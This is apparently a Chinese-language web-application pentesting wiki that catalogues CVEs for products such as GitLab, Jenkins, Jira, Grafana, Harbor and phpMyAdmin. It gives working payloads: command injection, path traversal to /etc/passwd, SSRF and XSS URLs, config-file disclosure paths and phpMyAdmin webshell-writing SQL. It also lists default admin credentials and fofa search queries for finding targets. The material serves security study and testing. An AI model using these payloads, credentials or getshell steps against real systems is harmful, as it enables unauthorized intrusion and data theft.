- Analysis of an Atlassian Crowd RCE - CVE-2019-11580
- CVE-2019-11580 RCE漏洞分析
POC | Payload | exp
- jas502n/CVE-2019-11580

Django

CVE-2020-7471 Django StringAgg SQL Injection漏洞

相关文章
- CVE-2020-7471 Django StringAgg SQL Injection漏洞复现

DolphinScheduler

官网 : https://dolphinscheduler.apache.org/zh-cn/

Apache DolphinScheduler(目前处在孵化阶段)是一个分布式、去中心化、易扩展的可视化DAG工作流任务调度系统，其致力于解决数据处理流程中错综复杂的依赖关系，使调度系统在数据处理流程中开箱即用。

默认密码

admin dolphinscheduler

CVE-2020-13922 权限覆盖漏洞

POC | Payload | exp

POST /dolphinscheduler/users/update
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

flask

flask

FlySpray

官网 : http://www.flyspray.org/

XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)

POC | Payload | exp
- FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery

GateOne

Fofa : app="GateOne"

相关文章

从RCE到CVE：攻防实战中的漏洞挖掘

CVE-2020-20184 rce

POC | Payload | exp

GateOne.ws.send('{"terminal:ssh_get_host_fingerprint":{"host":"目标IP","port":"22;cat /etc/passwd;"}}')

CVE-2020-35736 GateOne 路径遍历漏洞

POC | Payload | exp

/auth?next=%2F
/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Gerapy

相关文章

Gerapy项目的二次漏洞挖掘

CVE-2021-32849

影响版本
- Gerapy <= 0.9.6
相关文章
- Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849

Gitea

https://gitea.io/

Gitea 1.4.0 目录穿越导致命令执行漏洞

相关文章
- Go代码审计 - gitea 远程命令执行漏洞链
- https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce

GitLab

https://about.gitlab.com/install/

GitLab 的漏洞情报参考 https://gitlab.com/gitlab-org/cves/-/tree/master

CVE-2020-10977 GitLab 任意文件读取漏洞

影响范围
- 8.5 <= GitLab CE/EE <=12.9
相关文章
- GitLab任意文件读取漏洞复现
- Arbitrary file read via the UploadsRewriter when moving and issue

CVE-2021-4191

描述
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-4191.json
影响范围
- 13.0 <= Gitlab CE/EE < <14.6.5
- 14.7 <= Gitlab CE/EE < 14.7.4
- 14.8 <= Gitlab CE/EE < 14.8.2

CVE-2021-22205

影响范围
- 11.9.0 <= Gitlab CE/EE < 13.8.8
- 13.9.0 <= Gitlab CE/EE < 13.9.6
- 13.10.0 <= Gitlab CE/EE < 13.10.3
相关文章
POC | Payload | exp
- mr-r3bot/Gitlab-CVE-2021-22205
- inspiringz/CVE-2021-22205

CVE-2021-22214

描述
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22214.json
影响范围
- 10.5 <= Gitlab CE/EE < 13.10.5
- 13.11 <= Gitlab CE/EE < 13.11.5
- 13.12 <= Gitlab CE/EE < 13.12.2

CVE-2022-2185

描述
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json
影响范围
- 14.0 <= Gitlab CE/EE < 14.10.5
- 15.0 <= Gitlab CE/EE < 15.0.4
- 15.1 <= Gitlab CE/EE < 15.1.1

CVE-2022-2884

影响范围
11.3.4 <= GitLab CE/EE < 15.1.5
15.2 <= GitLab CE/EE < 15.2.3
15.3 <= GitLab CE/EE < 15.3.1

glpi

项目地址: https://github.com/glpi-project/glpi
fofa: app="TECLIB-GLPI"

CVE-2022-35914 GLPI htmLawedTest.php 远程命令执行漏洞

影响范围
GLPI <= 10.0.2
相关文章
- GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

GoAhead

CVE-2017-17562

影响范围
- GoAhead < 3.6.5
POC | Payload | exp

CVE-2021-42342

影响范围
- GoAhead =4.x
- 5.x<=GoAhead<5.1.5
相关文章
- CVE-2021-42342 GoAhead 远程命令执行漏洞深入分析与复现

GoCD

未授权路径穿越

相关文章
- GoCD 存在未授权路径穿越漏洞

Gogs

相关工具

TheZ3ro/gogsownz

CVE-2018-18925

相关文章
- Gogs 任意用户登录漏洞(CVE-2018-18925)

CVE-2018-20303

相关文章
- gogs/gitea CVE-2018-20303文件上传到RCE漏洞分析

Grafana

fofa: app="Grafana"

默认用户名密码

admin/admin

Grafana 6.4.3 Arbitrary File Read

相关文章
- Grafana 6.4.3 Arbitrary File Read

CVE-2020-13379

相关文章
- CVE-2020-13379

CVE-2021-41174

相关文章
- Grafana 8.2.3 released with medium severity security fix: CVE-2021-41174 Grafana XSS

CVE-2021-43798

影响版本
- Grafana 8.3.x < 8.3.1
- Grafana 8.2.x < 8.2.7
- Grafana 8.1.x < 8.1.8
- Grafana 8.0.x < 8.0.7
相关文章
POC | Payload | exp
- jas502n/Grafana-VulnTips
- A-D-Team/grafanaExp

8.x . CSRF

相关文章
- 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x .

GraphQL

相关文章

相关工具

swisskyrepo/GraphQLmap
doyensec/inql - 用于 GraphQL 安全测试的扩展
APIs-guru/graphql-voyager - Represent any GraphQL API as an interactive graph
- https://apis.guru/graphql-voyager/
nikitastupin/clairvoyance - Obtain GraphQL API schema despite disabled introspection!

相关案例

H1514 [beerify.shopifycloud.com] GraphQL discloses internal beer consumption

相关靶场

dolevf/Damn-Vulnerable-GraphQL-Application - Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security.
```
git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git && cd Damn-Vulnerable-GraphQL-Application
docker build -t dvga .
docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga
```
righettod/poc-graphql - Research on GraphQL from an AppSec point of view.

introspection/自省

Introspection is the ability to query which resources are available in the current API schema. Given the API, via introspection, we can see the queries, types, fields, and directives it supports.

由于自省机制，默认情况下，任何未经身份验证的用户都可以分析 GrapQL 模式。Introspection 允许我们获取有关所有请求、mutation、订阅和数据类型的信息，以及向发出请求的客户端提供的所有其他信息。通过请求 ___schema 元字段可以轻松获得此信息，根据规范，该信息始终可用于“root”类型的查询。

Content-Type: application/json

{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

Harbor

官网 : https://goharbor.io/

Harbor 的漏洞情报参考 https://github.com/goharbor/harbor/security/advisories

相关文章

云原生服务风险测绘分析(二)： Harbor

CVE-2019-3990 User Enumeration Vulnerability

https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg
描述
攻击者可通过 Harbor API 的逻辑漏洞，进行用户名枚举操作
影响版本
- harbor 1.7.0 ~ 1.7.6
- harbor 1.8.0 ~ 1.8.5
- harbor 1.9.0 ~ 1.9.1

POC | Payload | exp

GET /api/users/search?email=@test
.com
    => {"code":400,"message":"username is required"}

GET /api/users/search?username=t
    => User Enumeration

CVE-2019-16097 任意管理员注册漏洞

描述
攻击者可以利用该漏洞，在未授权的情况下发送恶意请求创建管理员账号，从而接管 Harbor 镜像仓库。
POC | Payload | exp
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/

CVE-2019-19030

https://github.com/goharbor/harbor/security/advisories/GHSA-q9x4-q76f-5h5j
描述
该漏洞将导致未授权的攻击者可以利用 harbor API 对 harbor 实例进行未经认证的调用，并根据响应中的 http 状态码去区分存在哪些资源，不存在哪些资源。

CVE-2020-13788 ssrf

描述
harbor 的 "Test Endpoint" API 在设计上存在脆弱性，可能会导致攻击者使用此 API 对 Harbor 服务器内部网络主机上开放的 TCP 端口进行扫描，从而使攻击者能够对内网资产进行探测。
POC | Payload | exp
- https://www.youtube.com/watch?v=v8Isqy4yR3Q

CVE-2020-13794

https://github.com/goharbor/harbor/security/advisories/GHSA-q9p8-33wc-h432
描述
harbor 的 /users API 设计上存在用户名枚举漏洞，针对普通用户，可通过 /api/users/search API 发送带有 username 和 _ 的 GET 请求列出所有用户名和 ID 信息。

CVE-2020-29662

https://github.com/goharbor/harbor/security/advisories/GHSA-38r5-34mr-mvm7
描述
harbor 的 v2 API 暴露在未经身份验证的 URL 上，导致非管理员身份用户进行访问的风险。

HFS

HFS远程命令执行漏洞

描述
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞，该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
案例
- 记一次SSRF+HFS命令执行回显相关研究

POC | Payload | exp

/?search==%00{.exec|cmd.exe /c [Command-String].}

Horde_Groupware_Webmail

Horde Groupware Webmail Edition 远程命令执行

描述
Horde Groupware Webmail 是美国 Horde 公司的一套基于浏览器的企业级通信套件。 Horde Groupware Webmail 中存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中，网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段，修改网络系统或组件的预期的执行控制流。
POC | Payload | exp
- https://srcincite.io/pocs/zdi-20-1051.py.txt

HUE

命令执行漏洞

POC | Payload | exp

Hue 后台编辑器存在命令执行漏洞，攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目的

ixcache

FOFA:title="iXCache"

默认口令

admin
ixcache

jellyfin

fofa: title="jellyfin"

CVE-2020-26948 ssrf

描述
Emby Server 4.5.0之前的版本允许通过Items/RemoteSearch/Image ImageURL参数进行SSRF。
POC | Payload | exp
- btnz-k/emby_ssrf

CVE-2021-21402

POC | Payload | exp
- https://github.com/chaitin/xray/pull/1206/files
- https://github.com/chaitin/xray/pull/1183/files

CVE-2021-29490

POC | Payload | exp

/Images/Remote?imageUrl=<URL>
/Items/RemoteSearch/Image?ImageUrl=<URL>&ProviderName=TheMovieDB

Jenkins

官网 : https://jenkins.io/

app="Jenkins"

Jenkins 的漏洞情报参考 https://jenkins.io/security/advisories/

搭建教程

Jenkins 搭建

相关文章

资源

相关工具

blackye/Jenkins - Jenkins漏洞探测、用户抓取爆破

未授权访问漏洞

描述
默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务，通过脚本执行界面从而获取服务器权限。
相关文章
- 知其一不知其二之Jenkins Hacking
利用
http://[ip]:8080/manage

CVE-2017-1000353 未授权远程代码执行漏洞

描述
Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理，反序列化 ObjectInputStream 作为 Command 对象，这将绕过基于黑名单的保护机制, 导致代码执行。
影响版本
- jenkins < 2.56
POC | Payload | exp
- vulhub/CVE-2017-1000353

CVE-2018-1000861 远程命令执行漏洞

描述
Jenkins 使用 Stapler 框架开发,其允许用户通过 URL PATH 来调用一次 public 方法.由于这个过程没有做限制,攻击者可以构造一些特殊的 PATH 来执行一些敏感的 Java 方法.
通过这个漏洞,我们可以找到很多可供利用的利用链.其中最严重的就是绕过 Groovy 沙盒导致未授权用户可执行任意命令:Jenkins 在沙盒中执行 Groovy 前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过 Meta-Programming 的方式,在检查这个步骤时执行任意命令.
影响版本
- jenkins < 2.153
POC | Payload | exp
- orangetw/awesome-jenkins-rce-2019

CVE-2018-1999001 配置文件路径改动导致管理员权限开放漏洞

描述
Jenkins 官方在 7 月 18 号发布了安全公告，对 Jenkins 的两个高危漏洞进行通告，其中包括配置文件路径改动导致管理员权限开放的漏洞 CVE-2018-1999001，未授权用户通过发送一个精心构造的登录凭据，能够致使匿名用户获取 Jenkins 的管理权限。
影响版本
- jenkins < 2.121.1
- jenkins 2.122 ~ 2.132
相关文章
- Jenkins配置文件路径改动导致管理员权限开放漏洞(CVE-2018-1999001)

CVE-2018-1999002 任意文件读取漏洞

描述
Jenkins 7 月 18 日的安全通告修复了多个漏洞，其中 SECURITY-914 是未授权任意文件读取漏洞。攻击者可以发送精心制作的 HTTP 请求，以返回 Jenkins 主文件中任何文件的内容，该漏洞存在于 Stapler Web 框架的 org/kohsuke/stapler/Stapler.java 中。
影响版本
- jenkins < 2.121.1
- jenkins 2.122 ~ 2.132
相关文章
- 安全研究 | Jenkins 任意文件读取漏洞分析
- Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录

CVE-2019-1003000 未授权访问 RCE 漏洞

描述
脚本安全插件 1.49 和更早版本的 src/main/Java/org/jenkinsci/plugins/Script Security/sandbox/groovy/GroovysandBox.Java 中存在沙箱绕过漏洞，使得攻击者能够提供沙箱脚本在 Jenkins 主 JVM 上执行任意代码。
影响版本
- jenkins < 1.49
相关文章
- Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog
- Jenkins RCE CVE-2019-1003000 漏洞复现
POC | Payload | exp
- adamyordan/cve-2019-1003000-jenkins-rce-poc: Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

CVE-2019-10320 CloudBees Jenkins Credentials Plugin 信息泄露漏洞

描述
CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Credentials Plugin 是使用在其中的一个身份凭据存储插件。 Jenkins Credentials Plugin 2.1.18 及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
影响版本
- jenkins < 2.1.18
相关文章
- Exploring the File System via Jenkins Credentials Plugin Vulnerability - CVE-2019-10320 | Nightwatch Cybersecurity

CVE-2019-10392 RCE with Git Client Plugin 2.8.2 (Authenticated)

POC | Payload | exp
- jas502n/CVE-2019-10392

Jira

官网 : https://www.atlassian.com/software/jira

JIRA 是 Atlassian 公司出品的项目与事务跟踪工具，被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

jira 的漏洞情报参考 https://jira.atlassian.com/browse/JRASERVER-69858?filter=13085

相关工具

bcoles/jira_scan
MayankPandey01/Jira-Lens - Fast and customizable vulnerability scanner For JIRA written in Python

CVE-2017-9506 ssrf

POC | Payload | exp

/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>

CVE-2018-20824 xss

POC | Payload | exp

/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

CVE-2019-3402 xss

POC | Payload | exp

/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

CVE-2019-3403 信息泄露(用户名枚举)

描述
Atlassian Jira 7.13.3 之前版本、8.0.4 之前版本和 8.1.1 之前版本中存在用户名枚举漏洞，攻击者可利用该漏洞枚举用户名称。
影响版本
- Atlassian Jira < 7.13.3
- Atlassian Jira 8.0.0 ~ 8.0.4
- Atlassian Jira 8.1.0 ~ 8.1.1
POC | Payload | exp
- /rest/api/2/user/picker?query=<USERNAME_HERE>
- https://blog.csdn.net/caiqiiqi/article/details/100094987

CVE-2019-8442 Jira 未授权敏感信息泄露

描述
Atlassian Jira 是澳大利亚 Atlassian 公司的一套缺陷跟踪管理系统. 该系统主要用于对工作中各类问题、缺陷进行跟踪管理. Atlassian Jira 7.13.4 之前版本、8.0.4 之前版本和 8.1.1 之前版本中的 CachingResourceDownloadRewriteRule 类存在安全漏洞. 远程攻击者可利用该漏洞访问 Jira webroot 中的文件.
影响版本
- Atlassian Jira < 7.13.3
- Atlassian Jira 8.0.0 ~ 8.0.4
- Atlassian Jira 8.1.0 ~ 8.1.1
POC | Payload | exp
- https://note.youdao.com/ynoteshare1/index.html?id=4189e6fb21fb097a4109ac22f33b16cb&type=note
- https://hackerone.com/reports/632808
- /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

CVE-2019-8444 存储型 XSS

描述
Atlassian Jira 7.13.6之前版本和8.3.2之前的8.x版本中的 wikirenderer 组件存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
影响版本
- Atlassian Jira 7.7 ~ 7.13.6
- Atlassian Jira 8.0.0 ~ 8.3.2

POC | Payload | exp

POST /rest/api/2/issue/TEST-7/comment HTTP/1.1
Content-Type: application/json

{"body":"!image.png|width=\\\" οnmοuseοver=alert(333);//!"}

CVE-2019-8446 信息泄露(用户名枚举)

描述
Atlassian Jira 8.3.2之前版本中的 /rest/issueNav/1/issueTable 资源存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。
影响版本
- Atlassian Jira 7.6 ~ 8.3.2
POC | Payload | exp
- https://talosintelligence.com/vulnerability_reports/TALOS-2019-0839

CVE-2019-8449

POC | Payload | exp
- /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
- mufeedvh/CVE-2019-8449

CVE-2019-8451 Jira 未授权 SSRF 漏洞

描述
Atlassian Jira 8.4.0 之前版本中的 /plugins/servlet/gadgets/makeRequest 资源存在代码问题漏洞。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。
影响版本
- Atlassian Jira 7.6.0 ~ 8.4.0
POC | Payload | exp
- /plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com
- jas502n/CVE-2019-8451

CVE-2019-11581 Atlassian Jira 模板注入漏洞

描述
Atlassian Jira 多个版本前存在利用模板注入执行任意命令
影响版本
- Atlassian Jira 4.4 ~ 7.6.14
- Atlassian Jira 7.7.0 ~ 7.13.5
- Atlassian Jira 8.0.0 ~ 8.0.3
- Atlassian Jira 8.1.0 ~ 8.1.2
- Atlassian Jira 8.2.0 ~ 8.2.3
相关文章
- Atlassian Jira 模板注入漏洞 (CVE-2019-11581)

CVE-2020-14179 Information Disclosure

POC | Payload | exp
```
/secure/QueryComponent!Default.jspa
```

CVE-2020-14181 User Enumeration

POC | Payload | exp

/secure/ViewUserHover.jspa?username=<USERNAME>

CVE-2020-36289

POC | Payload | exp

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

CVE-2021-26086

相关文章
- Jira 敏感信息泄漏复现 (CVE-2021-26086)
影响版本
- Atlassian Jira < 8.5.14
- Atlassian Jira 8.6.0 ~ 8.13.6
- Atlassian Jira 8.14.0 ~ 8.16.1

POC | Payload | exp

/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

CVE-2021-43947

相关文章
- CVE-2021-43947 Atlassian Jira Server Velocity SSTI漏洞绕过分析

CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF

相关文章
- CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF 漏洞
POC | Payload | exp
- assetnote/jira-mobile-ssrf-exploit

JumpServer

JumpServer远程执行漏洞

相关文章
- JumpServer远程执行漏洞复现
- JumpServer远程命令执行你可能不知道的点(附利用工具)
POC | Payload | exp
- Skactor/jumpserver_rce
- Veraxy00/Jumpserver-EXP

Jupyter

官网 : https://jupyter.org/

Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本，支持运行 40 多种编程语言。

未授权访问漏洞

描述
如果管理员未为 Jupyter Notebook 配置密码，将导致未授权访问漏洞，游客可在其中创建一个 console 并执行任意 Python 代码和命令。
示例
http://[ip]:8888

Kibana

CVE-2018-17246 Kibana Local File Inclusion

POC | Payload | exp
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.zh-cn.md

CVE-2019-7609

相关文章
- CVE-2019-7609：kibana 代码执行漏洞复现
POC | Payload | exp
- LandGrey/CVE-2019-7609
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2019-7609/README.zh-cn.md

KodExplorer

fofa: app="Powered-by-KodExplorer"
fofa: icon_hash="1636007688"

kodexplorer 4.32 SSRF漏洞

POC | Payload | exp

/index.php?app/getUrlTitle&url=192.168.1.1

# 通过返回的时间判断是否存活

Reflected xss

POC | Payload | exp

/index.php?explorer/fileView&path=</script><script>alert(1234)</script>

https://github.com/kalcaddle/KodExplorer/issues/482

svg ssrf

POC | Payload | exp

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200">
<image x="10" y="10" width="276" height="110" xlink:href="http://127.0.0.1:8000/svg" stroke-width="1" id="image3204" />
<rect x="0" y="150" height="10" width="300" style="fill: black"/>
</svg>

svg xss

POC | Payload | exp

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graph
ics/SVG/1.1/DTD/svg11.dtd">


<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg
">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width
:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
    alert(document.domain);
</script>
</svg>

Konga

Konga任意用户登录

相关文章
- Konga任意用户登录分析

MetaBase

fofa: app="Metabase"

CVE-2021-41277 MetaBase任意文件读取漏洞

相关文章
- CVSS 10.0｜MetaBase任意文件读取漏洞【无需认证】(CVE-2021-41277)
- MetaBase 任意文件读取漏洞(CVE-2021-41277) 复现
影响版本
- MetaBase < 0.40.5
- 1.0.0 <= MetaBase < 1.40.5
POC | Payload | exp
```
/api/geojson?url=file:/etc/passwd
```
- Seals6/CVE-2021-41277

MinIO

fofa: app="MinIO-Console"

CVE-2021-21287 MinIO未授权SSRF漏洞

相关文章
- 容器与云的碰撞——一次对MinIO的测试

CVE-2021-41266

https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36

Moodle

fofa: app="moodle"

CVE-2021-36393

相关文章
- Moodle: Blind SQL Injection (CVE-2021-36393) and Broken Access Control (CVE-2021-36397)

CVE-2021-36394

相关文章
- CVE-2021-36394-Moodle RCE漏洞分析及PHP反序列化利用链构造之旅

CVE-2021-40691

相关文章
- Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
- CVE-2021-40691 Moodle Shibboleth未授权session会话劫持漏洞

CVE-2022-0332

相关文章
- CVE-2022-0332 Moodle REST Web接口审计与H5P插件SQL注入漏洞分析

Nagios

CVE-2022-29272

POC | Payload | exp
- https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272

Nexus

官网 : https://www.sonatype.com/product-nexus-repository

默认密码

admin   admin123

CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0

描述
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发 Maven、NuGET 等软件源仓库.其 3.14.0 及之前版本中,存在一处基于 OrientDB 自定义函数的任意 JEXL 表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞.
影响版本
- nexus < 3.15.0
相关文章
- 一次偶遇Nexus
- Nexus Repository Manager 3 远程命令执行漏洞 (CVE-2019-7238)
POC | Payload | exp
- mpgn/CVE-2019-7238
- jas502n/CVE-2019-7238

CVE-2020-10199/CVE-2020-10204

相关文章
- Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论
POC | Payload | exp
- aleenzz/CVE-2020-10199

CVE-2020-29436

相关文章
- CVE-2020-29436：Nexus3 XML外部实体注入复现

NiFi

Fofa: "nifi" && title=="NiFi"

NiFi 未授权

POC | Payload | exp

/nifi/
/nifi-api/flow/current-user
/nifi-api/flow/process-groups/root
/nifi-api/access/config

NiFi Api 远程代码执行

POC | Payload | exp

imjdl/Apache-NiFi-Api-RCE

use exploit/multi/http/apache_nifi_processor_rce

nodejs

nodejs

noVNC

官网 : https://novnc.com

CVE-2017-18635 xss

描述
noVNC 是一款 HTML VNC(Virtual Network Computing)客户端库。 noVNC 0.6.2之前版本中存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
影响版本
- novnc < 0.6.2
相关文章
- Exploiting an old noVNC XSS (CVE-2017-18635) in OpenStack
POC | Payload | exp
- ShielderSec/cve-2017-18635

nps

nps认证绕过漏洞

漏洞利用工具
- carr0t2/nps-auth-bypass

OFBiz

Fofa: app="Apache_OFBiz"

CVE-2020-9496 Ofbiz反序列化漏洞

相关文章
- 浅析Ofbiz反序列化漏洞(CVE-2020-9496)
POC | Payload | exp
- https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/

CVE-2021-26295 RMI反序列化漏洞

相关文章
- Apache OFBiz 漏洞复现 (2021-26295/2020-9496)
POC | Payload | exp
- Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

CVE-2021-29200 Apache OFBiz RMI Bypass RCE

相关文章
- 【漏洞分析】CVE-2021-29200 Apache OFBiz RMI Bypass RCE 分析
POC | Payload | exp
- r0ckysec/CVE-2021-29200

CVE-2021-30128

相关文章
- Apache OFBiz 反序列化漏洞预警(CVE-2021-30128)
- 【漏洞分析】CVE-2021-30128 Apache OFBiz 反序列化漏洞
POC | Payload | exp
- r0ckysec/CVE-2021-30128

OpenAM

fofa: app="OpenAM"

CVE-2021-29156

相关文章
- CVE-2021-29156-ForgeRock OpenAm Webfinger协议 LDAP注入漏洞

CVE-2021-35464

相关文章
- Java反序列化之ForgeRock OpenAM CVE-2021-35464漏洞分析

phpMyAdmin

官网: https://www.phpmyadmin.net/

搭建教程

phpMyAdmin 搭建

相关文章

phpMyadmin各版本漏洞 - 2/3 老版本的漏洞
phpMyAdmin后台Getshell总结

通过 phpmyadmin 来 getshell

确认绝对路径
利用 log 变量,猜绝对路径
或者直接查询 select @@basedir;
直接 SQL 写文件 select '<?php phpinfo(); ?>' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/a.php';
如果 file_priv 为 null,那么是写不了的,可以尝试使用日志写马
```
set global general_log='on';
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/a.php';
select '<?php phpinfo(); ?>';
set global general_log=off;
```
参考 : phpMyAdmin新姿势getshell

CVE-2016-5734 4.0.x—4.6.2 远程代码执行漏洞

描述
phpMyAdmin 中存在安全漏洞，该漏洞源于程序没有正确选择分隔符来避免使用 preg_replacee 修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意 PHP 代码。以下版本受到影响：phpMyAdmin4.0.10.16之前4.0.x版本，4.4.15.7之前4.4.x版本，4.6.3之前4.6.x版本。
影响版本
- phpmyadmin 4.0.0 ~ 4.0.10.15
- phpmyadmin 4.4.0 ~ 4.4.15.6
- phpmyadmin 4.6.0 ~ 4.6.2
POC | Payload | exp
- phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution

phpMyAdmin 4.7.x CSRF

相关文章
- phpMyAdmin 4.7.x CSRF 漏洞利用

CVE-2018-12613 4.8.x 本地文件包含漏洞利用

相关文章
- phpMyAdmin 4.8.x 本地文件包含漏洞利用 | Vulnspy Blog 可以通过这个线上靶场实验,不过 docker 镜像可能有点问题,mysql 进程起不起来,我的解决方式是直接卸了重装 mysql-server,而且他默认的 apt 源无法访问,还要换一下 apt 源
- phpmyadmin4.8.1后台getshell
- CVE-2018-12613漏洞学习总结

CVE-2019-6799

相关文章
- phpMyAdmin任意文件读取漏洞复现(CVE-2019-6799)以及检测POC编写
POC | Payload | expGifts/Rogue-MySql-Server
```
vim rogue_mysql_server.py

PORT = 3307
```
python rogue_mysql_server.py
打开目标 phpMyAdmin 的登录页面,地址输入 db:3307、用户名、密码,提交登录.
回到 db 的终端,如果文件读取成功会将文件内容记录到 mysql.log 文件中

CVE-2019-12922 4.9.0.1 CSRF

描述
phpMyAdmin 4.9.0.1 版本中存在跨站请求伪造漏洞。该漏洞源于 WEB 应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过受影响客户端向服务器发送非预期的请求。
影响版本
- phpmyadmin 4.9.0.1
POC | Payload | exp
- <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />
- https://www.hedysx.com/bug/2398.html

CVE-2019-18622 xss

相关文章
- PHPmyadmin SQL injection in Designer feature 研究(CVE-2019-18622)
- https://github.com/phpmyadmin/phpmyadmin/issues/15651

CVE-2020-26935 phpmyadmin后台SQL注入

POC | Payload | exp

/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)

CVE-2022-23808 phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)

POC | Payload | exp
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A

PHP

CVE-2012-1823 PHPCGI 远程代码执行漏洞

描述
